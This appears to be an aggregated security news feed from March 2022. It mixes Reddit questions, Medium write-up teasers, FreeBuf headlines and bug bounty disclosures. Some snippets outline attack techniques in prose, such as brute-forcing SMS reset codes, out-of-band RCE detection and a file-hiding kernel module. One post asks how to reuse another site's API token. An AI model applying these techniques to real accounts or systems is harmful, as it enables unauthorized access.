    We have set up IPS monitoring on our firewall and I've been taking a look through the IPS events. Some are obvious on how to deal with, but some are harder, and I wondered if I could get some insight on what process you guys would follow for these? For example, one of our laptops on the remote VPN is triggering an IPS alert - 'TCP Segment Overwrite'. I google the text and I see that "This signature fires when one or more TCP segments in the same stream overwrite data from one or more segments located earlier in the stream. This may indicate an attempt to hide an attack." and also "Overwriting TCP segments does not normally occur and should be treated with suspicion". OK, sounds suspicious? So I run an AV scan, and the machine comes up clean. So where would I go from here? Disclaimer, I'm no "Mr Robot" lol. I can understand tcpdump in terms of tracing where a packet is going and which interface it goes in / out etc., but when it comes down to analysing packet contents etc. with Wireshark, well... my abilities just don't stretch that far :( I always seem to hit this brick wall with a lot of IPS alerts where I'm just sat thinking, I don't know exactly what's causing it so I can't say whether it's a false positive or not. It's very frustrating! :/ Thanks for any advice you can give! submitted by /u/EffectiveClock [link] [comments]
    FOSS App Whitelisting Suggestions for Win 10 Home
    I'm running Windows 10 Home on a personal computer and am seeking a FOSS-alternative to AppLocker (AppLocker can only be managed on Windows 10 Enterprise, Education, etc.). Does anyone have any suggestions? submitted by /u/cyberphor [link] [comments]
    How to clean an infected USB
    Hi everyone, let's say I have a USB and I'm sure there is some kind of virus on it. What is the best way to clean and secure it so I can keep using it in future? submitted by /u/emir0723 [link] [comments]
    I'm losing hope
    In October I realized I hated my job and I decided to learn IT because I've always wanted to work in that field. I did CS50 to the end and I loved it. Since I couldn't decide in what domain of IT I wanted to pursue my learning path (because everything interests me in IT), I went into cyber security since it's pretty much the IT domain that includes all the IT domains. I did TryHackMe's Pre Security path and now I'm almost done with the Jr Pentester path. I'm planning to do the Blue Team path. I also do CTFs to practice along. At this point I suppose that if this field was not for me I would've known by now, but so far I love it. I want to become a Blue Teamer. Now I'm reading here and there on Reddit that it's impossible to start in cybersec for a beginner because you need real IT experience, for instance years as a software/network engineer. Back when I started learning, people told me that I just needed lab practice and certifications and then boom, I could apply for entry level jobs in cybersec. I wanted to get my foot in the door by starting as a Help Desk and then as a Sys Admin; mastering the fundamentals is obviously mandatory so I know I can't just start as a Blue Team Expert, but do I really need to be a network engineer for multiple years to then have enough XP to enter cybersec's (cybersex) field? Thank you for guiding me. TL;DR: Is it mandatory to be an ex software/network engineer to then work in cyber security? submitted by /u/No-Lead497 [link] [comments]
    Converting .nessus files to CSV
    Hello AskNetsec, I have been performing CIS Benchmark scans and I am trying to find a good method for keeping track of audits while trying to remediate them. This is both for myself, our engineers and management. I have been struggling trying to find the right format to do this. I would like to convert .nessus files into CSV, I hope that will do the trick. Does anyone know a good method of converting from .nessus to CSV? If you have any other recommendations as to how to streamline this process you are most welcome to comment it. Thank you in advance! submitted by /u/Gabbana2 [link] [comments]
    About which cert I should pick
    My uni is providing a few certs under institutional training. The certs are: CompTIA A+, CompTIA Linux+, CompTIA Network+, CompTIA Server+, CompTIA Security+, VMware Virtualization and Software Defined Network Concepts, Palo Alto Cloud Security Fundamentals, Palo Alto Security Operations Fundamentals. My goal is to become a penetration tester and I am currently a first year student. I had plans to get Security+ in 3rd year, but since our uni has partnered I am confused which of these certs is best for me so that they help me in the placement drive and so that I can focus on studying for OSCP from 2nd year. So basically, which cert should I choose? I am very grateful for your help!! submitted by /u/Otaku531 [link] [comments]
    Could Russia create a true “splinternet”?
    Guess one model would be North Korea, but something tells me that Russia would have harder time based on geography and the population’s current usage of the internet. submitted by /u/DryBloomer [link] [comments]
  • Open

    AWS/GitLab Self-Hosted CTF
    submitted by /u/RedTermSession [link] [comments]
    Shodan: Introducing the InternetDB API
    submitted by /u/D4r1 [link] [comments]
    Making Sense Of The Dirty Pipe Vulnerability (CVE-2022-0847) - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]
    FirmWire is a full-system baseband firmware emulation platform
    submitted by /u/domenukk [link] [comments]
  • Open

    A Detailed Guide on httpx
    Introduction: httpx is a fast web application reconnaissance tool coded in Go by www.projectidscovery.io, with a plethora of modules effective in manipulating HTTP requests. The post A Detailed Guide on httpx appeared first on Hacking Articles.
  • Open

    How Important is The Red Team in Cyber Security?
    A red team plays a crucial role in cyber security as they pose as “ethical hackers.” Continue reading on Medium »
    TRY HACK ME: Intro to C2 Write-Up
    Task 1 Introduction - Continue reading on Medium »
  • Open

    Tonight at Midnight Presenting…
    If you pre-ordered, you know where I am going with this! Continue reading on Medium »
    SXSW 2022: Ti West’s X: Horror, Executed
    X is, indeed, gonna give it to ya Continue reading on Cinapse »
  • Open

    A beginner's take on data security 2
    A brief discussion of data security regulatory systems.
    FreeBuf Morning Report | Anonymous calls on Russians to "eliminate Putin"; One Piece broadcast suspended due to cyberattack
    Recently, Anonymous released a new message to Russian citizens, inviting them to join in "eliminating" President Putin, who is sacrificing them and killing Ukrainians.
    What is a HIPAA-compliant SSL certificate?
    With the widespread adoption of digitalization, SSL certificates have become an indispensable part of the network, and protecting sensitive data communications and user privacy is more important than ever.
    The "Regulations on the Online Protection of Minors (Draft for Comment)" released again for public comment
    The Regulations consist of seven chapters and sixty-seven articles, stating that families, schools and other educational institutions should educate and guide minors to take part in activities beneficial to physical and mental health, and prevent and intervene in minors' internet addiction.
    What to do when a website has only a login form? 6 bypass scenarios for username/password reset
    Using a short SMS verification code for password recovery, or setting no expiry on the code, lets an attacker brute-force the SMS code with automated tools within a time window and thereby reset the password of any account.
    Beware: the Android banking trojan Escobar is lying in wait
    Escobar, a new version of the Aberebot malware, adds new features, including stealing Google Authenticator multi-factor authentication codes.
    Ubisoft suffers cyberattack, causing temporary service disruption
    Rumors of a cyberattack on Ubisoft circulated online, and the data extortion group LAPSUS$ indicated that this was no rumor: they had breached Ubisoft.
    National Information Security Standardization Technical Committee publishes the "2022 List of National Cybersecurity Standard Requirements"
    The list contains 34 standards in total, of which 20 are new standards and 14 are revisions.
    Roundup: 12 risk-based authentication tools
    Risk-based authentication (RBA), also known as adaptive authentication, is a way to improve the security of website accounts without forcing users to use two-factor authentication (2FA).
    FreeBuf Morning Report | Google rolls out an air raid alert system to Ukrainian Android users; Ubisoft confirms cyberattack
    Google's official blog announced that it is pushing an air raid alert system to Android users in Ukraine. Google said that millions of people rely on air raid alert systems, and that it is delivered via Play Services.
  • Open

    SecWiki News 2022-03-14 Review
    [HTB] Ophiuchi Writeup by 0x584a; Watchdog or TeamTNT? A modest discussion of attack attribution in one case by Avenger; SecWiki Weekly (Issue 419) by ourren; For more recent articles, visit SecWiki
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    Offense and defense tricks: breaking through security protection via compatibility differences
    Author: Glassy Original link: https://g1asssy.com/2022/03/11/fuzz/ Introduction: When security protection products perform protection, they need to process the data in the traffic; likewise, the application under attack needs to process that data to keep the business running normally. However, in many cases the framework a security product uses to process the data stream differs from the one the application uses. For ordinary data there is of course no problem, but once the compatibility of the protected application's data-processing framework exceeds that of the security product's...
    Analysis of the reentrancy vulnerability in The idols NFT marketplace
    Author: Dig2 This article is a contributor submission; Seebug Paper looks forward to your sharing, and every accepted submission receives a gift! Submission email: paper@seebug.org Background: The idols is an NFT project on Ethereum; its distinguishing feature is that it distributes Lido staking rewards (funded by the roughly 2250 ETH raised in the project's public sale) according to the number of idols NFTs a user holds. The project also issues the $VIRTUE token, and users who buy and stake the token receive a share of idols NFT trading...
  • Open

    How to Fact Check News
    Now, more than ever we are bombarded with news on and offline. Friends share stories or post them on their walls, but how do you tell what… Continue reading on Medium »
    Solution to some CTF challenges from https://investigator.cybersoc.wales
    A few months ago I participated in the CTF of https://investigator.cybersoc.wales/. Continue reading on Medium »
  • Open

    Is there a way to see how someones API is formatted?
    I have the source files of the React app; it uses the Next.js framework. The .env file has process.env.NEXT_PUBLIC_API and process.env.NEXT_PUBLIC_API_TOKEN. I was able to get both values by using the inspect tool on the live page. They are:

        NEXT_PUBLIC_API=https://api.example.com
        NEXT_PUBLIC_API_TOKEN=thetokenstring

    The next.config.js file reads:

        module.exports = {
          webpack: (config, { isServer }) => {
            // Fixes npm packages that depend on `fs` module
            if (!isServer) {
              config.node = { fs: 'empty' }
            }
            return config
          }
        }

    I am trying to re-create the API so I can use my own in my app. When I use the inspect tool again on the live app and click the network tab, I can see the data the API is pulling in. It seems to be just in simple JSON formatting. When I enter the site through builtwith.com I can see some of it is hosted on AWS EC2 in addition to Vercel. In a .js file the API is pulled in like:

        _getPairs = async () => {
          try {
            const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/pairs`, {
              method: 'get',
              headers: {
                'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`,
              }
            })
            const pairsCall = await response.json()
            return pairsCall.data
          } catch(ex) {
            console.log(ex)
            return []
          }
        }

    and

        updatePairsCall = async (account) => {
          try {
            const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/updatePairs`, {
              method: 'get',
              headers: {
                'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`,
              }
            })
            const pairsCall = await response.json()
            this.setStore({ pairs: pairsCall.data })
            await this._getPairInfo(account, pairsCall.data)
          } catch(ex) {
            console.log(ex)
          }
        }

    Is there an easy way to re-create this API? Am I totally off base? Thank you submitted by /u/tokentrader [link] [comments]
  • Open

    Mac photo library
    Can it be determined what device was responsible for uploading image to cloud in photos.sqlite database — what info is available? submitted by /u/Complete-Cockroach80 [link] [comments]

  • Open

    Solution to my $20 egg hunt (Part 1)
    Last week, I posted an article titled “There’s $20 hidden in this post”. Here’s how to solve the first part of it… Continue reading on Medium »
    The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems
    A detailed post on how I chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication… Continue reading on Medium »
    Open Redirect via Sendgrid Email Misconfiguration
    Hello developer , bug hunter and cyber security enthusiast. In this opportunity i wanna show you my first Bug Bounty writeup from one of a… Continue reading on System Weakness »
    Cybersecurity Bible: The 5 rules for every beginner.
    I have come a long way in cybersecurity. Here’s why I'm eligible for writing this, I have faced every problem, had sleepless nights, and… Continue reading on Medium »
  • Open

    Reverse Engineering a Netgear NDay
    submitted by /u/lightgrains [link] [comments]
    An automated setup for fuzzing Apache httpd w/ AFL++
    submitted by /u/pwntheplanet [link] [comments]
    An automated setup for fuzzing Redis w/ AFL++
    submitted by /u/pwntheplanet [link] [comments]
  • Open

    Have I been Hacked or not????
    Have you ever thought you have been hacked? Or do you think your data’s secure in the digital world? We’re using many apps in our day to… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s good news, OSINT mobilizes for Ukraine, movement ecology achievements in AI, plus #Rstats tips for GIS and genomics Continue reading on Medium »
    SPY NEWS: 2022 — Week 10
    Summary of the espionage-related news stories for the Week 10 (7–12 March) of 2022. Continue reading on Medium »
  • Open

    Questions about getting into DF
    Hi everybody. I'm sorry if this post goes against any rules or has been answered in depth somewhere else. I'm a 2nd year computer science major wondering about getting into DF, especially the LE side of things. Does anyone have resources or information about the general path to getting a job in DF? Are there certain internships or work experience you can get while earning a degree that will help more than others? Are there specific certifications I should be looking to get in the future? Should I be pursuing a degree in DF, or would a degree in CS be a good base to work with? I don't think I have many classes that would transfer over besides some math/stats classes and a class on computer systems. I'm really just interested in seeing what the fastest path I can take from here to a job is, if I do end up pursuing DF. I really don't have any knowledge of DF or cybersecurity, but I made a TryHackMe account and I'll test the waters with some of the modules on there to see if I wanna really dive into this field. I've heard about SANS courses and seen some good online DF degrees from Champlain and other colleges, but I'm just not sure where to go from here. Thank you to anyone who takes the time to answer any of these questions! submitted by /u/Normijah625 [link] [comments]
  • Open

    A beginner's take on data security 1
    A security beginner's general discussion of data security
    Interpreting the "2021 Cyberspace Mapping Annual Report" | Public cloud asset profiling and risk measurement
    Recently, 绿盟科技 (NSFOCUS) and China Telecom jointly released the "2021 Cyberspace Mapping Annual Report", which aims to use mapping methods to discover the exposure on the public internet of assets in key areas such as IoT, public cloud, industrial control systems, security devices, databases and smart platforms
    Interpreting the "2021 DDoS Attack Landscape Report" | Threat-intelligence-based DDoS attack protection
    With the development of emerging digital industries such as 5G, cloud computing, big data and IoT, the scale of information infrastructure construction is expanding, which inevitably leads to more and more network assets being exposed on the internet. Once these assets are exploited by DDoS attackers, they will pose a serious threat to network security
    How to easily port all the programs in Kali to Debian and Ubuntu with Katoolin3
    Helps researchers easily port the various tools in Kali Linux to Linux operating systems such as Debian and Ubuntu.
    Russia will ban Instagram
    Russia's internet regulator Roskomnadzor will ban Instagram in Russia.
    An introduction to iptables & Netfilter
    An introduction to iptables & Netfilter
    SyntheticSun: a defense-in-depth security automation and monitoring framework that uses threat intelligence, machine learning, managed AWS security services and serverless technology to continuously prevent, detect and respond to threats
    SyntheticSun is a defense-in-depth security automation and monitoring framework that uses threat intelligence, machine learning, managed AWS security services and serverless technology to continuously prevent, detect and respond to threats.
  • Open

    SecWiki News 2022-03-13 Review
    Linux system security hardening guide by ourren; For more recent articles, visit SecWiki
  • Open

    Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)
    Article URL: https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 Comments URL: https://news.ycombinator.com/item?id=30661899 Points: 1 # Comments: 0
  • Open

    Fuzzing with AFL – Part 2: Trying Smarter(Apache)
    Article URL: https://0xbigshaq.github.io/2022/03/12/fuzzing-smarter-part2 Comments URL: https://news.ycombinator.com/item?id=30661893 Points: 1 # Comments: 0
  • Open

    scancss - Fastest tool to find XSS.
    Cross site scripting (XSS) vulnerability is very easy, popular and available on many websites. Continue reading on Medium »
  • Open

    How secure is credit card info on company servers nowadays?
    I'm reluctant to use credit cards when I can because I've seen a lot of stories of hacks into places like hotel servers where they get access to card details, customer name & address, etc. But most of these are from a few years ago; has there been an upgrade that minimized the risk of this happening nowadays? As in, is this info stored in a more secure way now? submitted by /u/computerstuffs [link] [comments]
    Fuzz testing in the SDLC
    My company’s security org is curious about adding fuzz testing to our secure SDLC pipeline. I’ve been reading about the topic, which I’m finding fascinating, but it’s also left me with some questions about when to fuzz and which flavour of fuzzing would make sense for the large number of services/APIs in our portfolio. -At which phase does fuzzing get in the picture? Is this something typically run later as in QA and deployment/release or post-commit/build similar to SAST? Would the latter scenario be redundant given we run SAST? -How agile is black box and grey box (instrumentation guided) fuzzing for an app portfolio with a rapidly changing attack surface? I’m leaning towards black-box mutation and template fuzzers since the attack surface can be supplied via a network traffic capture, API specification…all of which are easily retrievable from other tools in our QAT/AST framework. My understanding is grey box fuzzers require user programmed harness classes to interface with the app. Meaning every time a new entry point is added or removed or a new app is onboarded, the fuzzer needs an updated setup. Afaik this setup is done manually at least for all the open-source grey box fuzzers I’ve looked into. Any gotchas or recommendations on fuzz testing adoption strategy are much appreciated. submitted by /u/phuckphuckety [link] [comments]
    Any thoughts on this course called HEXORCIST?
    Looking for if anyone has any thoughts or opinions on this course for reverse engineering or if they themselves have signed up for this course? The course is found here https://www.reverse-engineer.net/ submitted by /u/SufficientDistrict10 [link] [comments]
    Organizing vulnerability research?
    Hi all! I've been doing bits and pieces of vulnerability research on my own time, and typically I do it only so far as I feel "engaged" with the project. As you might imagine, this leads to dropping projects often and swapping between them, which looks horrible for career potential but also leads me to be constantly burnt out of research and other hobby projects. I am revisiting a very niche router OS with intention to reverse engineer the firmware, such that I can understand its attack surface (and find bugs, eventually). This is a massive undertaking for me, but one that I believe is a good move as doing so would demonstrate my ability to adapt and learn new things; the biggest problem though, is me and my lack of organization. Thus, I'm wondering what tactics, techniques and procedures you all use when going about research. I'm no stranger to kanban boards and the like, and appreciate the idea of planning things out in weekly chunks, but is this advisable? submitted by /u/Mostly_Breadfruit [link] [comments]
  • Open

    Implementing Syscalls in Cobalt Strike Part 1 - Battling Imports and Dependencies
    submitted by /u/dmchell [link] [comments]
  • Open

    Korean and English Folder names, Movie names. stuff all over the place. (nsfw just in case)
    submitted by /u/thats_dumberst [link] [comments]

  • Open

    KB4288: CVE-2022-26500 | CVE-2022-26501
    submitted by /u/ghost-train [link] [comments]
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Can anyone recommend free remediation tracking software?
    App, web app, I don't care. I just need to keep track of things and organize them. Thanks submitted by /u/networkalchemy [link] [comments]
    Tool for network visualization
    Is there any free script or tool to visualize network knots like here? https://miro.medium.com/max/600/1*D3DB7o6maH5BAxm5vWL4XA.png submitted by /u/dashlf92 [link] [comments]
    Open source Web application security scan tool
    Is there any good Open Source Web Application Security Scan Tool you can recommend? We've developed a few web applications and look to build better protections. thanks, submitted by /u/alphasystem [link] [comments]
    State of the Subreddit #4
    Hello r/AskNetsec! It's been a while since we've last done one of these, and we hope that you all have been well. We, the moderators, wish you all well, and that everyone stays safe during these interesting times. Flair system! - As you might have noticed, flairs have appeared. In order to organize the sub in a friendly manner, we have implemented a required flair system. The flairs: Analysis – Requesting aid to determine security/network-related issues. WITH DATA/Background. Architecture – Questions related to best practices for environmentally based things. Product etc. Concepts – Questions around security concepts (IE Least Privileged, User Awareness, CIA Triad, Walled Garden, etc.) Threats – Questions related to specific threats in the security landscape. Compliance – Questions around compliance and legal standards (GDPR, NIST, PCI-DSS, etc.) Education – Further education questions, what certificates, degrees to go for, getting started in the field, etc. Work – Related to work questions. Burnout, salary, HR, etc. Other – Not fitting other categories. This is, of course, still a work in progress. Please feel free to comment on any suggestions you might have. I would like to reiterate that asking for help in committing a crime of any sort is not allowed. This is an immediate permanent ban. The sub has been growing well in the past few months, and we couldn't be more grateful for the support that has been given. We will see you all again in 3 months for the next State of the Subreddit. - AskNetSec Moderators submitted by /u/-Vampires- [link] [comments]
  • Open

    What model of ThinkPad should I buy for malware analysis?
    I am going to be starting community college as a cybersecurity major, and I am really interested in malware analysis. I heard that the ThinkPad is a pretty good laptop for that sort of thing, so I am looking into buying one pretty soon. I'm currently doing an internship and my boss told me that I should get a laptop that runs Hyper-V and VMs. He also told me that the P15 series is pretty good for malware, but I am not sure yet. What model of the ThinkPad should I get for this, and what specs do you suggest that I look for? submitted by /u/MadScientist876 [link] [comments]
    Asking for help in what’s steps need to be taken to data recovery on a wiped iPhone 6s 128g
    I recently received an iPhone 6s 128gb in for data recovery. I'm using this as an opportunity for learning, as I've never done recovery on an iPhone, so I came here to ask what steps I should take and what should be done for the best chance of data recovery. Please and thank you submitted by /u/23Weirdo23 [link] [comments]
    Prima facie
    Typically how is prima facie established in digital forensics? Again, is user attribution important for prima facie or is a somebody owning an equipment/control of an account sufficient? submitted by /u/Complete-Cockroach80 [link] [comments]
  • Open

    Geolocating Images — Tryhackme
    Geolocating Images. Continue reading on Medium »
  • Open

    Domain Escalation: Resource Based Constrained Delegation
    Introduction Delegation has been a part of Microsoft’s Active Directory environment since the early 2000s and has remained one of few ignored threats by system The post Domain Escalation: Resource Based Constrained Delegation appeared first on Hacking Articles.
  • Open

    A bug that made me $250
    Hey guys! I’m back with another write-up and this one’s about a bug for which I got awarded $250, so let’s start. Continue reading on Medium »
    Tactical Fuzzing — XSS
    XSS Continue reading on Medium »
    A Tale of Open Redirection to Stored XSS
    Hello guys, Continue reading on Medium »
    I have Found Microsoft Subdomain Website database list, database username, password
    Hello, Hackers 👋👋 Continue reading on Medium »
    XSS through base64 encoded JSON
    This is one of my very interesting and unexpected finding while testing an Application Tracking System. Continue reading on Medium »
  • Open

    The Discovery and Exploitation of CVE-2022-25636
    Article URL: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/ Comments URL: https://news.ycombinator.com/item?id=30653137 Points: 92 # Comments: 3
  • Open

    SecWiki News 2022-03-12 Review
    Design ideas and a simple practice for security middleware by ourren; Building the OpenCTI threat intelligence platform by ourren; Artificial Intelligence (AI) & Cybersecurity by ourren; Security and Beauty: my observations and thoughts on cybersecurity by ourren; Practice and reflections on open-source component governance by ourren; AKG: Attacker Knowledge Graph by ourren. For more of the latest articles, visit SecWiki
  • Open

    Census Vulnerability Exposes 10k OAuth Tokens, Thousands of User Records
    Article URL: https://robertwillishacking.com/census-vulnerability-exposes-10k-oauth-tokens-thousands-of-user-records/ Comments URL: https://news.ycombinator.com/item?id=30652143 Points: 3 # Comments: 0
  • Open

    Casper-fs LKM
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files. This program has two principal functions: the first is hiding private files. The second function is to protect confidential files to prevent reading, writing and removal. https://github.com/CoolerVoid/casper-fs submitted by /u/CoolerVoid [link] [comments]

  • Open

    Insecure comparison in PHP — Business Logic Bypass vulnerability
    I have recently spotted an interesting vulnerability in a PHP application, which was in scope of a private bug bounty program. This… Continue reading on InfoSec Write-ups »
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    Hello everyone! Continue reading on Medium »
    Rate Limit Bypass at Readme.com
    Hey Community !! Continue reading on Medium »
    How I chained open-redirect to SSRF (Server Side Request Forgery)?
    So you are here. I have seen people reporting open-redirect without exploiting it for SSRF and being happy with low impact. You should… Continue reading on Medium »
    How I was able to take over any user's account on a major telecoms website
    Hello, today's write up is about multiple instances of the same vulnerability I found on a major African telecoms provider's website, we… Continue reading on Medium »
    FREE LABS TO TEST YOUR PENTEST/CTF SKILLS
    · Academy Hackaflag BR - https://hackaflag.com.br/ · Attack-Defense - https://attackdefense.com · Alert to win - https://alf.nu/alert1 ·… Continue reading on Medium »
    A bug bounty mistake…
    Sometimes if it looks like XSS, it may not actually be XSS. Continue reading on Medium »
  • Open

    New Content!
    Hello! If you happen to find this page, all content has been moved and will be published to my new site going forward. Continue reading on Medium »
    TryHackMe | Red Team Fundamentals WriteUp
    This room is an introduction to red teaming Continue reading on Medium »
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows and new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    As an IT veteran, getting into Cybersecurity. What are my best next steps to move toward an IT/Cybersecurity Forensics career?
    Hello everyone. I will achieve my Security+ certification this year (mere months away). Currently, I have lots of IT experience, over 20 years of IT analyst, Helpdesk, and IT Desktop support, but I'm new to IT Security beyond what those roles entail. My question is: What should my next step(s) be to get a solid Cybersecurity Forensics career underway? I love remote (WFH) work and hope to one day have more of that, and less office time needed, but starting out, I'll do what I have to do. Do I need to study for a more advanced cert right away after getting the Security+? I know I need to work in a more entry-level IT Security-based job FIRST, get my feet wet obviously, prove I can do the basics, but beyond that, what should I be focusing on to move in the IT forensics direction? I really do appreciate any help, tips, play by plays, or just guidance for this in general. submitted by /u/cleverestx [link] [comments]
    Google search warrant return question
    As you can tell by reading, I'm new to this. Thanks for any insights: Is it normal that some of the elements of a Google search warrant are formatted in HTML as a bunch of boxes containing information? I'm surprised that it wouldn't just be all in CSV or some other easy to parse/sort format. Under MyActivity, there's a document that lists browser/search activity (in boxes) that say "Visited Google Search" but none of these appear to contain any detail about what was searched. Am I not able to see what was actually searched? Is that something the user elected to keep private or is that standard reporting behavior of a Google return? Is folder-by-folder, file-by-file examination of these various HTML and CSV files the way most people approach looking through these things? Is there an obvious, better way? submitted by /u/PieWithIceCreamCrust [link] [comments]
  • Open

    SATCOM terminals under attack in Europe: a plausible analysis.
    submitted by /u/eberkut [link] [comments]
    An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives
    submitted by /u/albinowax [link] [comments]
  • Open

    LockBit 2.0 ransomware bugs and database recovery attempts
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    CVE-2022-24696 – Glance by Mirametrix Privilege Escalation
    When investigating my laptop, I stumbled upon something interesting that resulted in privilege escalation. I use a Lenovo ThinkPad X1 Extreme Gen 1, which has an installed software named Glance, for my day-to-day work. The purpose of this software is to use the advanced web camera to figure out if you are speaking when the... The post CVE-2022-24696 – Glance by Mirametrix Privilege Escalation appeared first on TrustedSec.
  • Open

    What's the best free security scan tool for C/C++ files?
    My team needs to run a security analysis on an entire Github repo that includes mostly C/C++ files (a couple of non-C/C++ files are there too). What's the best free security scan tool that can be used to scan a repo in a Linux environment and scan all C/C++ files in the directories/subdirectories of the repo for bugs, vulnerabilities, code smells, etc.? submitted by /u/techsavvynerd91 [link] [comments]
    Are the type of "Flood" attacks really important?
    Hey folks, I'm learning about DDoS attacks, and I see a lot of ICMP floods, UDP floods, HTTP floods, etc. At the end of the day, the attacker sends Ethernet frames to the victim server and its network, so if we look only at how it affects the bandwidth of the server or network devices, there isn't any difference. In my point of view, it can only help to pass some obstacles. For example, the firewall blocks ICMP requests, but not HTTP, because those are legitimate requests for a web server like Amazon. Maybe the difference can be significant if we talk about exhausting CPU and RAM, because HTTP GET or POST can probably require the server to do a lot more than the ICMP protocol. Did I get it right or totally mess something up? Thanks. submitted by /u/Webly99 [link] [comments]
    Car transmission hack
    I'm a target of hackers right now. They have hacked my car alarm to beep nonstop. Now for the first time yesterday my car was hacked to go from D to Neutral while driving. Any thoughts on how they did it? Don't tell me to get maintenance on my car, I'm a former mechanic and it's not a transmission problem... submitted by /u/Dogfish18 [link] [comments]
    Accessing home server from outside home - Possible methods without publicly opening access?
    Hello! I have a very basic homeserver connected to a router via LAN. I use it for Plex and Nextcloud. I am pretty technologically adept, but I am not close to being adept at networking or security. I do take my privacy somewhat seriously and I'm assuming that simply port forwarding my Plex and Nextcloud instances to be able to access them outside of my house is dangerous. But I'm also in a position where I'm not informed enough to do something different. I can easily follow guides to do stuff and can troubleshoot. The homeserver runs Ubuntu. Are my doubts about port forwarding unfounded? If not, what other alternatives can I use to remotely access my homeserver and how would I go about installing them? I'm sorry if this is a very stupid question; as I said before, I'm not adept when it comes to networking and security. Thanks in advance! submitted by /u/sadhgurukilledmywife [link] [comments]
    Tencent's VooV Meeting - Thoughts?
    It looks like my team is being cornered into installing VooV Meeting for some management meetings for various reasons. I've suggested using the web-based version, which hasn't seemed to work in their test meetings. I'm looking for some opinions on the use of this meeting software. I'm already planning to install it for the requested meeting, then immediately uninstall it afterwards. Considering further measures. Am I being paranoid? submitted by /u/unseenspecter [link] [comments]
  • Open

    CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
    IBM disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/938684
    Public Jenkins instance with /script enabled
    IBM disclosed a bug submitted by thesanjok: https://hackerone.com/reports/1492447
  • Open

    Yamagata XSS journey
    Hi readers! This write-up is about my Yamagata XSS labs journey. There is a total of 19 stages in this lab. We have to execute the… Continue reading on Medium »
  • Open

    ‘We are not ready’: a cyber expert on US vulnerability to a Russian attack
    Article URL: https://www.theguardian.com/technology/2022/mar/10/us-russia-cyber-attack-prepared Comments URL: https://news.ycombinator.com/item?id=30642010 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-11 Review
    Cybersecurity 2022: Watching over high quality (PDF) by ourren. For more of the latest articles, visit SecWiki
  • Open

    [ Hack The Box ] Kryptic Ransomware - Writeup
    Europol EC3 is looking for clues that will lead to the arrest and prosecution of the Enigma Team leader. Continue reading on Medium »
    Managing your licenses in Lampyre
    If you have been following us on Medium for a while, you might have read our ‘OSINT 101 with Lampyre’ article, which is basically a good… Continue reading on Medium »
    OhSint Machine
    This is a walkthrough for the Osint Machine from TryHackMe . They just give us an image. Let’s open the image, we get the image of… Continue reading on Medium »
    How to find someone on OnlyFans?
    How to find someone on OnlyFans? We’ve been chatting to some experts in online investigations, what we found out was pretty useful. Continue reading on Medium »
    How to Find Someone on POF?
    Are you trying to find someone, that perhaps shouldn’t be on Plenty of Fish (POF)? Continue reading on Medium »
  • Open

    Introducing the mystery lab challenge
    For anyone who's used the Web Security Academy before, you'll be pretty familiar with the format. For those of you who haven't had the pleasure, the process goes a little bit like this: Select a set o
  • Open

    OOB methods for detecting RCE while evading system hardening
    What methods do you use to identify RCE (Remote Code Execution)? Personally, I like to use OOB (out-of-band). Time-based methods such as sleep are accurate too, but these days, with so much asynchronous logic, I think OOB is more accurate than timing. (Of course, I check both 😊) Naturally, depending on the service's infrastructure, there are many places where outbound requests to the outside are restricted. However, the restriction is usually on general traffic; cases that block DNS queries as well are not common. (If the attacker's domain is queried through the internal DNS, the attacker ends up learning that a web request was attempted via OOB.)
  • Open

    John Carmack: How could anyone not like video games?
    The god of games
    Guarding finance with security: a review of the CIS 2021 Spring Edition fintech sub-forum
    On the afternoon of March 9, the fintech security session of the "CIS 2021 Cybersecurity Innovation Conference Spring Edition" was successfully live-streamed online.
    CPPCC National Committee member Xiao Xinguang: three proposals focus on advancing cybersecurity scenario exercises, IT supply chain cybersecurity capability, and software security engineering
    On March 10, the fifth session of the 13th National Committee of the Chinese People's Political Consultative Conference closed in Beijing. At this year's Two Sessions, CPPCC National Committee member and Antiy Group founder Xiao Xinguang submitted three proposals focusing on advancing cyber…
    FreeBuf Weekly | Samsung's source code and 190GB of confidential data published; Firefox hit by two more 0-day vulnerabilities
    Following the leak of 75GB of NVIDIA's confidential data and core source code, the ransomware group published 150GB of confidential data and core source code from South Korea's Samsung Electronics.
    Emotet botnet makes a comeback, having infected 130,000 devices in 179 countries
    Since its return last November, Emotet has grown rapidly and gained new capabilities it did not have before.
    A brief analysis of cryptographic security, part 2
